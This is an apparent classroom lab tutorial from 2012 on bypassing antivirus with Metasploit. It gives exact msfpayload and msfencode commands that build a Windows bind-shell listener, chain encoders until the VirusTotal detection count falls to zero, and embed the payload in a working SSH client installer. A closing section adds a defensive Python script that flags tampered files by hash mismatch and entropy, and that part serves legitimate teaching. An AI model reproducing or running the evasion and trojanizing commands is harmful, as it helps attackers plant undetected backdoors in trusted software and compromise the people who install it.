Jul 27, 2012

Bypassing Antivirus with Msfencode

What You Need

  • A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.

WARNING

We are using some harmless test files, but don’t infect people with any real viruses; that’s a crime!

Purpose

Antivirus protects machines from malware, but not from all of it. There are ways to pack or encode malware so that it is harder to detect. We’ll use Metasploit’s encoders to render a test payload completely invisible to antivirus engines.

Creating a Listener

This section builds a simple payload that gives the attacker remote control of a machine by listening on a TCP port. It is not a virus and won’t spread, but it is detected by antivirus engines.

In BackTrack, in a Terminal window, execute these commands:

cd
msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe

You should see the listen.exe file, as shown below:

Analyzing the Listener with VirusTotal

In BackTrack, click Applications, Internet, “Firefox Web Browser”.

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the listen.exe file.

“listen.exe” appears in the “Choose File” box, as shown below:

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that many of the antivirus engines detected the file: 33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Saving the Screen Image

Make sure the result is visible, showing something like “Detection rate: 33/42”, as shown above.

Save a screen capture with a filename of “Proj 6xa from YOUR NAME”.

Encoding the Listener

This process will encode the listener and embed it in an innocent SSH client installer, which msfencode uses as a template executable (the -x option) while keeping the template’s original behavior (the -k option).

In BackTrack, in a Terminal window, execute these commands:

wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe
msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*

You should see the evil_ssh.exe file, as shown below:

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the evil_ssh.exe file.

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that fewer of the antivirus engines detect the file now: 21 out of 42, when I did it, as shown below. You may see different numbers.

Encoding the Listener Again

This process will encode the listener several times, passing the output of each encoder into the next, as recommended by Keith Burton (Thanks!).

In BackTrack, in a Terminal window, execute these commands:

msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1
msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*

You should see several files, as shown below:

Analyzing the Re-encoded Listener with VirusTotal

In Firefox, go to https://www.virustotal.com/

Click the “Choose File” button. Navigate to /root and double-click the listen5.exe file.

In the VirusTotal web page, click the “Scan It!” button.

If you see a “File already analyzed” message, click the “View last analysis” button.

The analysis shows that even fewer of the antivirus engines detect the file now: 0 out of 42, when I did it, as shown below. You may see different numbers.
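The drop from 33/42 to 0/42 shows why signature matching alone is weak: each encoder pass rewrites the payload bytes, so a signature for the original listener no longer matches, and embedding the result in a real installer (with -k keeping the installer working) means the user sees nothing unusual. Two checks a defender can still apply are comparing the file’s hash against the vendor-published hash of the genuine installer, and measuring Shannon entropy across the file, since an encoder-wrapped payload tends to look like a block of random bytes spliced into otherwise ordinary data. The script below is an added example, not part of the original project; it works on constructed in-memory data (a repetitive “clean installer” and a copy with a pseudo-random region inserted) rather than the real sshSecureShellClient-3.2.9.exe, and the KNOWN_GOOD_SHA256 value is a placeholder computed from the constructed data, standing in for a hash you would get from the vendor.

```python
import hashlib
import math
import random

# Constructed sample data (not real files): a low-entropy "clean installer"
# made of repeated text, and a copy with a pseudo-random region spliced in to
# stand in for an encoder-transformed payload.
_rng = random.Random(2482)  # fixed seed so the results are reproducible
CLEAN_INSTALLER = b"SSH Secure Shell Client 3.2.9 installer " * 200  # 8000 bytes
INJECT_OFFSET = 4096
INJECTED_BLOB = bytes(_rng.getrandbits(8) for _ in range(1024))
TAMPERED_INSTALLER = (CLEAN_INSTALLER[:INJECT_OFFSET]
                      + INJECTED_BLOB
                      + CLEAN_INSTALLER[INJECT_OFFSET:])

# Placeholder for the vendor-published hash of the genuine installer. In practice
# this value comes from the vendor, never from the file being checked.
KNOWN_GOOD_SHA256 = hashlib.sha256(CLEAN_INSTALLER).hexdigest()


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the whole file as a hex string."""
    return hashlib.sha256(data).hexdigest()


def integrity_matches(data: bytes, expected_sha256: str) -> bool:
    """True only if the file hashes to the expected (vendor-published) value."""
    return sha256_hex(data) == expected_sha256


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a single repeated value, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def high_entropy_windows(data: bytes, window: int = 512, threshold: float = 7.0) -> list:
    """Offsets of fixed-size windows whose entropy exceeds the threshold.

    Plain text or code rarely exceeds ~6 bits/byte; encrypted, compressed or
    encoder-wrapped data sits close to 8. The final partial window is included.
    """
    return [off for off in range(0, len(data), window)
            if shannon_entropy(data[off:off + window]) > threshold]


def assess(data: bytes, expected_sha256: str) -> dict:
    """Combine both checks; a hash mismatch alone is enough to call the file suspicious."""
    hash_ok = integrity_matches(data, expected_sha256)
    flagged = high_entropy_windows(data)
    return {
        "hash_ok": hash_ok,
        "high_entropy_windows": flagged,
        "suspicious": (not hash_ok) or bool(flagged),
    }


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_INSTALLER), ("tampered", TAMPERED_INSTALLER)):
        print(name, assess(blob, KNOWN_GOOD_SHA256))
```

On the constructed data the clean copy passes both checks and the tampered copy fails the hash check and shows two high-entropy windows at offsets 4096 and 4608, exactly where the random region was inserted. The hash check is the stronger of the two: many legitimate installers are compressed or packed and are high-entropy throughout, so entropy should be read as a prompt for closer inspection, not as a verdict on its own.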

Sources

http://www.damballa.com/downloads/r_pubs/WP_SerialVariantEvasionTactics.pdf

http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html

http://www.securitylabs.in/2011/12/easy-bypass-av-and-firewall.html
